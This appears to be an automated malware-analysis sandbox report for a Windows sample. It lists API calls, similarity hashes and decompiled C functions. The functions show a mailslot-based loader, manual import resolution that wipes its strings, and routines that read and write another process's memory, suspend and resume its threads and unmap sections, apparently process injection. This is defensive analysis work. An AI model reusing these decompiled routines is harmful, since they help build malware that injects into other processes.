  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E14CA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45 Total matches: 29librarythread
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
  • Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
  • Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
  • Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
  • FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3F3A, Relevance: 10.6, APIs: 7, Instructions: 75 Total matches: 204
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
